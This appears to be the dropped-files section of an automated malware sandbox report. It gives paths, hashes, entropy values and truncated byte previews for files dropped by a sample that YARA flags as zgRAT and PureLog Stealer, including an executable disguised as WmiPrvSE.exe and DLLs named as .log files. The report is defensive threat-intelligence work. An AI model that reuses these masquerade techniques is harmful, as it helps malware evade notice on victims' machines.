Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d...........!..................... ........@.. ....................................@.................................h...S.................................................................................... ............... ..H............text....... ...................... ..`.rsrc...............................@..@.reloc..............................@..B........................H........k..hC...........j......................................................................................................................................................................`..~...CE.w#'..................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

C:\Users\user\Desktop\ywOZehbx.log

Download File

Process:	C:\Windows\GameBarPresenceWriter\WmiPrvSE.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	126976
Entropy (8bit):	6.057993947082715
Encrypted:	false
SSDEEP:	3072:V2IJq7YkHFJwBTZtHrC/0/FHkINvdF+nTCkjk1U+1:V2IJq7YbrFHkIrgnTQ
MD5:	16B480082780CC1D8C23FB05468F64E7
SHA1:	6FDDF86F9F0FBAA189F5CB79E44999A3F1AC2B26
SHA-256:	7A080D8BD178EC02C7F39F7F941479074C450C4FDD8E963C993D2FB5537C7708
SHA-512:	A165BB5D7972DE124F670BCAC20B4A46727B7CF27D1ED925D02F7CC7C79D7D04122D7C202C67D7EAE798348E8D481F085282EB5B89D84B902607D7EB1155BA19
Malicious:	true
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d.........." ..................... ... ....@.. .......................`......:.....@.....................................O.... .......................@....................................................... ............... ..H............text...$.... ...................... ..`.rsrc........ ......................@..@.reloc.......@......................@..B........................H...........(...........<...h.........................................................@.......0.................................................................................................................................Y........;~..................................................................#...+...3...;...C...S...c...s...................................................................................................................................................

C:\Users\user\Desktop\zHFGLnTh.log

Download File

Process:	C:\Windows\GameBarPresenceWriter\WmiPrvSE.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	34304
Entropy (8bit):	5.618776214605176
Encrypted:	false
SSDEEP:	768:TBS4lqbgy0+q1nyfBYUyxYIAmghwpgAaaY5:TDY0+q1noBhyufmgCgxa
MD5:	9B25959D6CD6097C0EF36D2496876249
SHA1:	535B4D0576746D88537D4E9B01353210D893F4D2
SHA-256:	4DBA0293B2BA9478EC0738BAD92F0E56CB7CF800B0CA4FDA8261EE2C0C91E217
SHA-512:	C6FA40C2DA5B12683F2785F688984754DF5E11B95170B628F2721A21CD9A6E392672166892B994B8996DC961893A57DAD815C959C6076AB4F91404FEF66141FA
Malicious:	true
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d...........!.....~..........n.... ........@.. ...............................G....@.....................................O.................................................................................... ............... ..H............text...t\|... ...~.................. ..`.rsrc...............................@..@.reloc..............................@..B................P.......H........c...8...........b.......................................................................................................................................................................,....:;.....>..................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

C:\Users\user\Desktop\zgMHUZTa.log

Download File

Process:	C:\Windows\GameBarPresenceWriter\WmiPrvSE.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	46592
Entropy (8bit):	5.870612048031897
Encrypted:	false
SSDEEP:	768:kEXtbvrhKJukN9LCewFI4eYWza7q9GYBAfNhgi2keA1RLaew5trbNM:NhKZEq4hWO7cAfN6DdA1R9w5x
MD5:	3601048DFB8C4A69313A593E74E5A2DE
SHA1:	A36A9842EA2D43D7ED024FFB936B4E9AE6E90338
SHA-256:	F5F1BA9E344B2F2E9CF90978C6D3518DFB55B316489E360874E3A1144BAC3C05
SHA-512:	B619A3D2C5CFADDEC234471FF68F96F19CFBBB5491439C3EE3593E0B2B6F995EBDC208563CC1B04FA383A983540646D02681B0CC039595C1845FE8F7941ABB23
Malicious:	true
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...j..d...........!..................... ........@.. ....................... .......h....@.....................................S.................................................................................... ............... ..H............text...$.... ...................... ..`.rsrc...............................@..@.reloc..............................@..B........................H............K...........w.................................................................................................................................................................................$A.................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

C:\Users\user\Desktop\zuvWKvqh.log

Download File

Process:	C:\Windows\GameBarPresenceWriter\WmiPrvSE.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	38912
Entropy (8bit):	5.679286635687991
Encrypted:	false
SSDEEP:	768:RH9nQF3DwRvGTYLOFbL79ed5l8UNebCPncg:TyDF0PybCPn
MD5:	9E910782CA3E88B3F87826609A21A54E
SHA1:	8DBC333244620EDA5D3F1C9EAA6B924455262303
SHA-256:	3B311986251EE5A303671108AFBAF43E0255C4CAE1C26CC9600BB0C7D22D3864
SHA-512:	592981359F46BBC577BE99DEFE3E2A17998BA2882AAAA20107841BCA97C2121CB97C45BC6EDBFC3F430D31450457CD855751727922AB4BB1A3C12DA050EEC057
Malicious:	true
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d...........!..................... ........@.. ....................................@.................................h...S.................................................................................... ............... ..H............text....... ...................... ..`.rsrc...............................@..@.reloc..............................@..B........................H........k..hC...........j......................................................................................................................................................................`..~...CE.w#'..................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

C:\Windows\GameBarPresenceWriter\24dbde2999530e

Download File

Process:	C:\Users\user\Desktop\9D7RwuJrth.exe
File Type:	ASCII text, with very long lines (582), with no line terminators
Category:	dropped
Size (bytes):	582
Entropy (8bit):	5.867048081676709
Encrypted:	false
SSDEEP:	12:Ctw9y7AA1Q3P1z/KXWnApLjtPfUce8aW/42ED98NniXUCwUF:+AA1Q3NzMSApvhfMEABB8okS
MD5:	510CFC0BD2D37E50C1D6FA9F3A7EB763
SHA1:	2D3FCEBF90C58CDF62844569E99EC4ED5AEFEB99
SHA-256:	6CEA6EC1C4D0E897C9DE1D22BAC102083772A11CE0D31756541BA79E25AB967A
SHA-512:	27A10651B7098E5268600873920B2AB0E6069850A4171B4D33B0F1BA6B1137CBFAFFDBBA052360E35DE0AA8937077AAC1B9925640FA617AFF094E6B87F61F481
Malicious:	false
Preview:	hNcJP2Num9EBDGAC4cm4c65Np5eHh2mH7TJ1y6TgIPWIVpzviYbYeWHlRPdUYFNtW6Dt6IN7IGwMkw1AGsiIbNnkMijjc9ICCnwYlFzaKeQXk4AfXdOphFRJTdhXioeI8tK6AdZA3I767PARhEL9vcf6VmFIhc1gAHZ1tEe4ENvYHVLEcPzeceXfNNkXYQcbRb6zzJidjR5iqGzAbBpSmWDfu4ngdHgxuUHqZWOTrW4LjyyHYk6XlKy4XaF5gB9cvHyW9IlFwVlQb265FfH3KJMjfNS9QSxpWcZcAcIQ91kPjicfdJ0A3GRm4O0vzmyei539cd5nX13Ti7A7uxfHbxvPKxhwlWaXCFqnodC9NNmCM8D6N3ACGqCvKoyp6JBBbgQdRXSRvf3OKtCMukisVYQVC5dAoXDELlkprjpzlsQlwykamm5VkSpDQ4aV4SnXbzCjIWfK5tHmHojOUCYBcsd25hZwIT5SF3J7vBRPGua1LC5mVMB14l5tWKnl7tBlyyhOemdSuI4rSmr2mxa6SDYd7akkYqRXtyDXfrHtssGvqObudu9KSESuZDREB24E0h7diT

C:\Windows\GameBarPresenceWriter\WmiPrvSE.exe

Download File

Process:	C:\Users\user\Desktop\9D7RwuJrth.exe
File Type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	3408384
Entropy (8bit):	7.803162366843507
Encrypted:	false
SSDEEP:	49152:dvE7aj/zSltwCUFFINtKAh/tIBs2htYmMoxqSeU843FULbiGLSkGHuIB6MlwALMV:9FzPFFIv7h/KVWYxVeE+i1FOIB6Mmkw
MD5:	0AD0B4A4A549230E090D712B5521BD96
SHA1:	55690E0D976955E80F14C314EFCAA34E3303A02B
SHA-256:	9882EE185D8D4DB2A86040B7E3C7687CEF737470F2A7B5C88868E80880CBD429
SHA-512:	B689AB2B7E3A59F760D3C6CB3B72927E3DC0EB9323ACEB05C2571CA85863FC769098924B943E6E80EDB1853C348451869996FD4C38A7DD10DC8E2970E5D4D027
Malicious:	true
Yara Hits:	Rule: JoeSecurity_zgRAT_1, Description: Yara detected zgRAT, Source: C:\Windows\GameBarPresenceWriter\WmiPrvSE.exe, Author: Joe Security Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: C:\Windows\GameBarPresenceWriter\WmiPrvSE.exe, Author: Joe Security Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: C:\Windows\GameBarPresenceWriter\WmiPrvSE.exe, Author: Joe Security Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: C:\Windows\GameBarPresenceWriter\WmiPrvSE.exe, Author: Joe Security Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: C:\Windows\GameBarPresenceWriter\WmiPrvSE.exe, Author: Joe Security Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: C:\Windows\GameBarPresenceWriter\WmiPrvSE.exe, Author: Joe Security
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...J..g..................3.........N.4.. ... 4...@.. .......................`4...........@...................................4.K.... 4. ....................@4...................................................... ............... ..H............text...T.3.. ....3................. ..`.rsrc... .... 4.......3.............@....reloc.......@4.......4.............@..B................0.4.....H...........X...........<...+;).\|.4......................................0..........(.... ........8........E........q...M...)...8....(.... ....~....{....:....& ....8....(.... ....~....{}...:....& ....8....(.... ....~....{....:....& ....8z......0.......... ........8........E........%...[...............8....r...ps....z~....9d... ....8....~....(7... .... .... ....s....~....(;....... ....8....8.... ....~....{....:o...& ....8d......... ....~....{....9J...& ....8?.......~....(?..

C:\Windows\GameBarPresenceWriter\WmiPrvSE.exe:Zone.Identifier

Download File

Process:	C:\Users\user\Desktop\9D7RwuJrth.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	26
Entropy (8bit):	3.95006375643621
Encrypted:	false
SSDEEP:	3:ggPYV:rPYV
MD5:	187F488E27DB4AF347237FE461A079AD
SHA1:	6693BA299EC1881249D59262276A0D2CB21F8E64
SHA-256:	255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
SHA-512:	89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
Malicious:	true
Preview:	[ZoneTransfer]....ZoneId=0

C:\Windows\INF\WmiApRpl\WmiApRpl.h

Download File

Process:	C:\Windows\System32\wbem\WMIADAP.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	3444
Entropy (8bit):	5.011954215267298
Encrypted:	false
SSDEEP:	48:ADPo+gDMIuK54DeHNg9dqbEzCJGGgGDU3XgLBgaGKFijiVJtVAAF/XRgW:ADw+gDMhK54qHC7aBvGKFijiV7XRgW
MD5:	B133A676D139032A27DE3D9619E70091
SHA1:	1248AA89938A13640252A79113930EDE2F26F1FA
SHA-256:	AE2B6236D3EEB4822835714AE9444E5DCD21BC60F7A909F2962C43BC743C7B15
SHA-512:	C6B99E13D854CE7A6874497473614EE4BD81C490802783DB1349AB851CD80D1DC06DF8C1F6E434ABA873A5BBF6125CC64104709064E19A9DC1C66DCDE3F898F5
Malicious:	false
Preview:	//////////////////////////////////////////////////////////////////////////////////////////////..//..// Copyright (C) 2000 Microsoft Corporation..//..// Module Name:..// WmiApRpl..//..// Abstract:..//..// Include file for object and counters definitions...//..//////////////////////////////////////////////////////////////////////////////////////////////......#define.WMI_Objects.0..#define.HiPerf_Classes.2..#define.HiPerf_Validity.4....#define.MSiSCSI_ConnectionStatistics_00000.6....#define.BytesReceived_00000.8..#define.BytesSent_00000.10..#define.PDUCommandsSent_00000.12..#define.PDUResponsesReceived_00000.14....#define.MSiSCSI_InitiatorInstanceStatistics_00001.16....#define.SessionConnectionTimeoutErrorCount_00001.18..#define.SessionDigestErrorCount_00001.20..#define.SessionFailureCount_00001.22..#define.SessionFormatErrorCount_00001.24....#define.MSiSCSI_InitiatorLoginStatistics_00002.26....#define.LoginAcceptRsps_00002.28..#define.LoginAuthenticateFails_00002.30..#define.LoginAuthFai

C:\Windows\INF\WmiApRpl\WmiApRpl.ini

Download File

Process:	C:\Windows\System32\wbem\WMIADAP.exe
File Type:	Unicode text, UTF-16, little-endian text, with very long lines (405), with CRLF line terminators
Category:	dropped
Size (bytes):	48786
Entropy (8bit):	3.5854495362228453
Encrypted:	false
SSDEEP:	384:esozoNc1+12zG1+b61ubSGMLVrj4+PtC81ZBg4Lg4ung4og4uo91K91zI91K91z2:esozozBg4Lg4ung4og4uWG4MG4o1
MD5:	DF877BEC5C9E3382E94FEA48FEE049AC
SHA1:	1D61436C8A1C057C1B1089EB794D90EE4B0D8FE9
SHA-256:	7F0F3FA64E41A30BACA377B6399F8F7087BC54DA9FCA876BFDC2C2EEECA8454B
SHA-512:	433CB16EBE2292CB60CB8CE71207EBB752295FB73E6D13E215E771EC5FC433EE29577AF28641255810C18078B95F04A9D37734B6F49CB6A6302821E365672205
Malicious:	false
Preview:	.././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././....././....././. .C.o.p.y.r.i.g.h.t. .(.C.). .2.0.0.0. .M.i.c.r.o.s.o.f.t. .C.o.r.p.o.r.a.t.i.o.n....././....././. .M.o.d.u.l.e. .N.a.m.e.:....././. .W.m.i.A.p.R.p.l....././....././. .A.b.s.t.r.a.c.t.:....././....././. .D.e.s.c.r.i.b.e.s. .a.l.l. .t.h.e. .c.o.u.n.t.e.r.s. .s.u.p.p.o.r.t.e.d. .v.i.a. .W.M.I. .H.i.-.P.e.r.f.o.r.m.a.n.c.e. .p.r.o.v.i.d.e.r.s....././....././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././.............[.i.n.f.o.].....d.r.i.v.e.r.n.a.m.e.=.W.m.i.A.p.R.p.l.....s.y.m.b.o.l.f.i.l.e.=.W.m.i.A.p.R.p.l...h.........[.l.a.n.g.u.a.g.e.s.].....0.0.9.=.E.n.g.l.i.s.h.....0.0.9.=.E.n.g.l.i.s.h.........[.o.b.j.e.c.t.s.].....W.M.I._.O.b.j.e.c.t.s._.0.0.

C:\Windows\System32\PerfStringBackup.INI

Download File

Process:	C:\Windows\System32\wbem\WMIADAP.exe
File Type:	data
Category:	dropped
Size (bytes):	840878
Entropy (8bit):	3.4224066455051885
Encrypted:	false
SSDEEP:	3072:xJQGb/6IPolY/OhyIGmZkzTMWcnqgspmTbQiIJEDc3dv+eBrq2Bw+1wQ5xcEkc7+:01nqgsp2gOKih3
MD5:	D3ED23A3E63ACA8CF656C585568DA6D7
SHA1:	1A499D7E9A030D53B2A4DBD36F6F14B6531A6094
SHA-256:	AE5A6E258A41298BE6CF2B3DA812E992E1D6A3C7FBC7DD4AA8B413DA850E8B65
SHA-512:	21E2953B0819567865DA9C80A7D07021D7ED48F4BA3CD843C42D13D18E0E8FB27FA2F7C4EC86D4A1F4D887146F0F7E9E05B6A53D85398EA43240C2E180D52E00
Malicious:	false
Preview:	........[.P.e.r.f.l.i.b.].....B.a.s.e. .I.n.d.e.x.=.1.8.4.7.....L.a.s.t. .C.o.u.n.t.e.r.=.1.0.1.2.2.....L.a.s.t. .H.e.l.p.=.1.0.1.2.3.........[.P.E.R.F._...N.E.T. .C.L.R. .D.a.t.a.].....F.i.r.s.t. .C.o.u.n.t.e.r.=.6.8.4.0.....F.i.r.s.t. .H.e.l.p.=.6.8.4.1.....L.a.s.t. .C.o.u.n.t.e.r.=.6.8.5.2.....L.a.s.t. .H.e.l.p.=.6.8.5.3.........[.P.E.R.F._...N.E.T. .C.L.R. .N.e.t.w.o.r.k.i.n.g.].....F.i.r.s.t. .C.o.u.n.t.e.r.=.6.8.2.8.....F.i.r.s.t. .H.e.l.p.=.6.8.2.9.....L.a.s.t. .C.o.u.n.t.e.r.=.6.8.3.8.....L.a.s.t. .H.e.l.p.=.6.8.3.9.........[.P.E.R.F._...N.E.T. .C.L.R. .N.e.t.w.o.r.k.i.n.g. .4...0...0...0.].....F.i.r.s.t. .C.o.u.n.t.e.r.=.6.9.0.0.....F.i.r.s.t. .H.e.l.p.=.6.9.0.1.....L.a.s.t. .C.o.u.n.t.e.r.=.6.9.2.6.....L.a.s.t. .H.e.l.p.=.6.9.2.7.........[.P.E.R.F._...N.E.T. .D.a.t.a. .P.r.o.v.i.d.e.r. .f.o.r. .O.r.a.c.l.e.].....F.i.r.s.t. .C.o.u.n.t.e.r.=.8.9.1.6.....F.i.r.s.t. .H.e.l.p.=.8.9.1.7.....L.a.s.t. .C.o.u.n.t.e.r.=.8.9.4.4.....L.a.s.t. .H.e.l.p.=.8.9.4.5.........[.P.E.R.F._...N.E.

C:\Windows\System32\PerfStringBackup.TMP

Download File

Process:	C:\Windows\System32\wbem\WMIADAP.exe
File Type:	data
Category:	dropped
Size (bytes):	840878
Entropy (8bit):	3.4224066455051885
Encrypted:	false
SSDEEP:	3072:xJQGb/6IPolY/OhyIGmZkzTMWcnqgspmTbQiIJEDc3dv+eBrq2Bw+1wQ5xcEkc7+:01nqgsp2gOKih3
MD5:	D3ED23A3E63ACA8CF656C585568DA6D7
SHA1:	1A499D7E9A030D53B2A4DBD36F6F14B6531A6094
SHA-256:	AE5A6E258A41298BE6CF2B3DA812E992E1D6A3C7FBC7DD4AA8B413DA850E8B65
SHA-512:	21E2953B0819567865DA9C80A7D07021D7ED48F4BA3CD843C42D13D18E0E8FB27FA2F7C4EC86D4A1F4D887146F0F7E9E05B6A53D85398EA43240C2E180D52E00
Malicious:	false
Preview:	........[.P.e.r.f.l.i.b.].....B.a.s.e. .I.n.d.e.x.=.1.8.4.7.....L.a.s.t. .C.o.u.n.t.e.r.=.1.0.1.2.2.....L.a.s.t. .H.e.l.p.=.1.0.1.2.3.........[.P.E.R.F._...N.E.T. .C.L.R. .D.a.t.a.].....F.i.r.s.t. .C.o.u.n.t.e.r.=.6.8.4.0.....F.i.r.s.t. .H.e.l.p.=.6.8.4.1.....L.a.s.t. .C.o.u.n.t.e.r.=.6.8.5.2.....L.a.s.t. .H.e.l.p.=.6.8.5.3.........[.P.E.R.F._...N.E.T. .C.L.R. .N.e.t.w.o.r.k.i.n.g.].....F.i.r.s.t. .C.o.u.n.t.e.r.=.6.8.2.8.....F.i.r.s.t. .H.e.l.p.=.6.8.2.9.....L.a.s.t. .C.o.u.n.t.e.r.=.6.8.3.8.....L.a.s.t. .H.e.l.p.=.6.8.3.9.........[.P.E.R.F._...N.E.T. .C.L.R. .N.e.t.w.o.r.k.i.n.g. .4...0...0...0.].....F.i.r.s.t. .C.o.u.n.t.e.r.=.6.9.0.0.....F.i.r.s.t. .H.e.l.p.=.6.9.0.1.....L.a.s.t. .C.o.u.n.t.e.r.=.6.9.2.6.....L.a.s.t. .H.e.l.p.=.6.9.2.7.........[.P.E.R.F._...N.E.T. .D.a.t.a. .P.r.o.v.i.d.e.r. .f.o.r. .O.r.a.c.l.e.].....F.i.r.s.t. .C.o.u.n.t.e.r.=.8.9.1.6.....F.i.r.s.t. .H.e.l.p.=.8.9.1.7.....L.a.s.t. .C.o.u.n.t.e.r.=.8.9.4.4.....L.a.s.t. .H.e.l.p.=.8.9.4.5.........[.P.E.R.F._...N.E.

C:\Windows\System32\perfc009.dat

Download File

Process:	C:\Windows\System32\wbem\WMIADAP.exe
File Type:	data
Category:	dropped
Size (bytes):	137550
Entropy (8bit):	3.409189992022338
Encrypted:	false
SSDEEP:	1536:X1i4nfw8ld9+mRDaUR28oV7TYfXLi7NwrgSwNu56FRtg:XBnfw8ld9+mRDaUR28oV7TY+7S0ba
MD5:	084B771A167854C5B38E25D4E199B637
SHA1:	AE6D36D4EC5A9E515E8735525BD80C96AC0F8122
SHA-256:	B3CF0050FAF325C36535D665C24411F3877E3667904DFE9D8A1C802ED4BCD56D
SHA-512:	426C15923F54EC93F22D9523B5CB6D326F727A34F5FF2BDE63D1CB3AD97CAB7E5B2ABABBC6ED5082B5E3140E9342A4E6F354359357A3F9AEF285278CB38A5835
Malicious:	false
Preview:	1...1.8.4.7...2...S.y.s.t.e.m...4...M.e.m.o.r.y...6...%. .P.r.o.c.e.s.s.o.r. .T.i.m.e...1.0...F.i.l.e. .R.e.a.d. .O.p.e.r.a.t.i.o.n.s./.s.e.c...1.2...F.i.l.e. .W.r.i.t.e. .O.p.e.r.a.t.i.o.n.s./.s.e.c...1.4...F.i.l.e. .C.o.n.t.r.o.l. .O.p.e.r.a.t.i.o.n.s./.s.e.c...1.6...F.i.l.e. .R.e.a.d. .B.y.t.e.s./.s.e.c...1.8...F.i.l.e. .W.r.i.t.e. .B.y.t.e.s./.s.e.c...2.0...F.i.l.e. .C.o.n.t.r.o.l. .B.y.t.e.s./.s.e.c...2.4...A.v.a.i.l.a.b.l.e. .B.y.t.e.s...2.6...C.o.m.m.i.t.t.e.d. .B.y.t.e.s...2.8...P.a.g.e. .F.a.u.l.t.s./.s.e.c...3.0...C.o.m.m.i.t. .L.i.m.i.t...3.2...W.r.i.t.e. .C.o.p.i.e.s./.s.e.c...3.4...T.r.a.n.s.i.t.i.o.n. .F.a.u.l.t.s./.s.e.c...3.6...C.a.c.h.e. .F.a.u.l.t.s./.s.e.c...3.8...D.e.m.a.n.d. .Z.e.r.o. .F.a.u.l.t.s./.s.e.c...4.0...P.a.g.e.s./.s.e.c...4.2...P.a.g.e. .R.e.a.d.s./.s.e.c...4.4...P.r.o.c.e.s.s.o.r. .Q.u.e.u.e. .L.e.n.g.t.h...4.6...T.h.r.e.a.d. .S.t.a.t.e...4.8...P.a.g.e.s. .O.u.t.p.u.t./.s.e.c...5.0...P.a.g.e. .W.r.i.t.e.s./.s.e.c...5.2...B.r.o.w.s.e.r...5.4...A.n.n.o.u.

C:\Windows\System32\perfh009.dat

Download File

Process:	C:\Windows\System32\wbem\WMIADAP.exe
File Type:	data
Category:	dropped
Size (bytes):	715050
Entropy (8bit):	3.278818886805871
Encrypted:	false
SSDEEP:	3072:NUdGNuowE4j0PrRZnpETMDZ8M6d0PHHx643/A5BK9YXdhPHlVziwC4ALWI1dnmRh:78M6d0w+WB6I
MD5:	342BC94F85E143BE85B5B997163A0BB3
SHA1:	8780CD88D169AE88C843E19239D9A32625F6A73E
SHA-256:	F7D40B4FADA44B2A5231780F99C3CE784BCF33866B59D5EB767EEA8E532AD2C4
SHA-512:	0A4ED9104CAFCE95E204B5505181816E7AA7941DED2694FF75EFABAAB821BF0F0FE5B32261ED213C710250B7845255F4E317D86A3A6D4C2C21F866207233C57E
Malicious:	false
Preview:	3...T.h.e. .S.y.s.t.e.m. .p.e.r.f.o.r.m.a.n.c.e. .o.b.j.e.c.t. .c.o.n.s.i.s.t.s. .o.f. .c.o.u.n.t.e.r.s. .t.h.a.t. .a.p.p.l.y. .t.o. .m.o.r.e. .t.h.a.n. .o.n.e. .i.n.s.t.a.n.c.e. .o.f. .a. .c.o.m.p.o.n.e.n.t. .p.r.o.c.e.s.s.o.r.s. .o.n. .t.h.e. .c.o.m.p.u.t.e.r.....5...T.h.e. .M.e.m.o.r.y. .p.e.r.f.o.r.m.a.n.c.e. .o.b.j.e.c.t. . .c.o.n.s.i.s.t.s. .o.f. .c.o.u.n.t.e.r.s. .t.h.a.t. .d.e.s.c.r.i.b.e. .t.h.e. .b.e.h.a.v.i.o.r. .o.f. .p.h.y.s.i.c.a.l. .a.n.d. .v.i.r.t.u.a.l. .m.e.m.o.r.y. .o.n. .t.h.e. .c.o.m.p.u.t.e.r... . .P.h.y.s.i.c.a.l. .m.e.m.o.r.y. .i.s. .t.h.e. .a.m.o.u.n.t. .o.f. .r.a.n.d.o.m. .a.c.c.e.s.s. .m.e.m.o.r.y. .o.n. .t.h.e. .c.o.m.p.u.t.e.r... . .V.i.r.t.u.a.l. .m.e.m.o.r.y. .c.o.n.s.i.s.t.s. .o.f. .t.h.e. .s.p.a.c.e. .i.n. .p.h.y.s.i.c.a.l. .m.e.m.o.r.y. .a.n.d. .o.n. .d.i.s.k... . .M.a.n.y. .o.f. .t.h.e. .m.e.m.o.r.y. .c.o.u.n.t.e.r.s. .m.o.n.i.t.o.r. .p.a.g.i.n.g.,. .w.h.i.c.h. .i.s. .t.h.e. .m.o.v.e.m.e.n.t. .o.f. .p.a.g.e.s. .o.f. .c.o.d.e. .a.n.d. .d.a.t.a. .b.e.t.

C:\Windows\System32\wbem\Performance\WmiApRpl_new.h

Download File

Process:	C:\Windows\System32\wbem\WMIADAP.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	3444
Entropy (8bit):	5.011954215267298
Encrypted:	false
SSDEEP:	48:ADPo+gDMIuK54DeHNg9dqbEzCJGGgGDU3XgLBgaGKFijiVJtVAAF/XRgW:ADw+gDMhK54qHC7aBvGKFijiV7XRgW
MD5:	B133A676D139032A27DE3D9619E70091
SHA1:	1248AA89938A13640252A79113930EDE2F26F1FA
SHA-256:	AE2B6236D3EEB4822835714AE9444E5DCD21BC60F7A909F2962C43BC743C7B15
SHA-512:	C6B99E13D854CE7A6874497473614EE4BD81C490802783DB1349AB851CD80D1DC06DF8C1F6E434ABA873A5BBF6125CC64104709064E19A9DC1C66DCDE3F898F5
Malicious:	false
Preview:	//////////////////////////////////////////////////////////////////////////////////////////////..//..// Copyright (C) 2000 Microsoft Corporation..//..// Module Name:..// WmiApRpl..//..// Abstract:..//..// Include file for object and counters definitions...//..//////////////////////////////////////////////////////////////////////////////////////////////......#define.WMI_Objects.0..#define.HiPerf_Classes.2..#define.HiPerf_Validity.4....#define.MSiSCSI_ConnectionStatistics_00000.6....#define.BytesReceived_00000.8..#define.BytesSent_00000.10..#define.PDUCommandsSent_00000.12..#define.PDUResponsesReceived_00000.14....#define.MSiSCSI_InitiatorInstanceStatistics_00001.16....#define.SessionConnectionTimeoutErrorCount_00001.18..#define.SessionDigestErrorCount_00001.20..#define.SessionFailureCount_00001.22..#define.SessionFormatErrorCount_00001.24....#define.MSiSCSI_InitiatorLoginStatistics_00002.26....#define.LoginAcceptRsps_00002.28..#define.LoginAuthenticateFails_00002.30..#define.LoginAuthFai

C:\Windows\System32\wbem\Performance\WmiApRpl_new.ini

Download File

Process:	C:\Windows\System32\wbem\WMIADAP.exe
File Type:	Unicode text, UTF-16, little-endian text, with very long lines (405), with CRLF line terminators
Category:	dropped
Size (bytes):	48786
Entropy (8bit):	3.5854495362228453
Encrypted:	false
SSDEEP:	384:esozoNc1+12zG1+b61ubSGMLVrj4+PtC81ZBg4Lg4ung4og4uo91K91zI91K91z2:esozozBg4Lg4ung4og4uWG4MG4o1
MD5:	DF877BEC5C9E3382E94FEA48FEE049AC
SHA1:	1D61436C8A1C057C1B1089EB794D90EE4B0D8FE9
SHA-256:	7F0F3FA64E41A30BACA377B6399F8F7087BC54DA9FCA876BFDC2C2EEECA8454B
SHA-512:	433CB16EBE2292CB60CB8CE71207EBB752295FB73E6D13E215E771EC5FC433EE29577AF28641255810C18078B95F04A9D37734B6F49CB6A6302821E365672205
Malicious:	false
Preview:	.././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././....././....././. .C.o.p.y.r.i.g.h.t. .(.C.). .2.0.0.0. .M.i.c.r.o.s.o.f.t. .C.o.r.p.o.r.a.t.i.o.n....././....././. .M.o.d.u.l.e. .N.a.m.e.:....././. .W.m.i.A.p.R.p.l....././....././. .A.b.s.t.r.a.c.t.:....././....././. .D.e.s.c.r.i.b.e.s. .a.l.l. .t.h.e. .c.o.u.n.t.e.r.s. .s.u.p.p.o.r.t.e.d. .v.i.a. .W.M.I. .H.i.-.P.e.r.f.o.r.m.a.n.c.e. .p.r.o.v.i.d.e.r.s....././....././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././.............[.i.n.f.o.].....d.r.i.v.e.r.n.a.m.e.=.W.m.i.A.p.R.p.l.....s.y.m.b.o.l.f.i.l.e.=.W.m.i.A.p.R.p.l...h.........[.l.a.n.g.u.a.g.e.s.].....0.0.9.=.E.n.g.l.i.s.h.....0.0.9.=.E.n.g.l.i.s.h.........[.o.b.j.e.c.t.s.].....W.M.I._.O.b.j.e.c.t.s._.0.0.

C:\Windows\system32\wbem\Performance\WmiApRpl.h (copy)

Download File

Process:	C:\Windows\System32\wbem\WMIADAP.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	3444
Entropy (8bit):	5.011954215267298
Encrypted:	false
SSDEEP:	48:ADPo+gDMIuK54DeHNg9dqbEzCJGGgGDU3XgLBgaGKFijiVJtVAAF/XRgW:ADw+gDMhK54qHC7aBvGKFijiV7XRgW
MD5:	B133A676D139032A27DE3D9619E70091
SHA1:	1248AA89938A13640252A79113930EDE2F26F1FA
SHA-256:	AE2B6236D3EEB4822835714AE9444E5DCD21BC60F7A909F2962C43BC743C7B15
SHA-512:	C6B99E13D854CE7A6874497473614EE4BD81C490802783DB1349AB851CD80D1DC06DF8C1F6E434ABA873A5BBF6125CC64104709064E19A9DC1C66DCDE3F898F5
Malicious:	false
